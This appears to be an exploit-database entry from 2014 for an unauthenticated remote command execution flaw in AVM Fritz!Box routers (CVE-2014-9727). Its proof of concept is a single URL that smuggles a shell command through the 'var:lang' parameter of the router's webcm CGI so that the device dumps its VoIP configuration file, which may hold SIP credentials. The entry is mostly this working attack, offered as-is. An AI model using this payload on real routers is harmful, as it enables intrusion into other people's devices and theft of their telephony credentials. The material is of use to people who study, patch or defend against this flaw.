Fritz!Box - Remote Command Execution

Author: 0x4148
type: webapps
platform: hardware
port: 
date_added: 2014-05-01 
date_updated: 2014-05-01 
verified: 0 
codes: OSVDB-103289;CVE-2014-9727 
tags: 
aliases:  
screenshot_url:  
application_url: 

App : Fritz!Box
Author : 0x4148

Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw

Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26

#0x4148_rise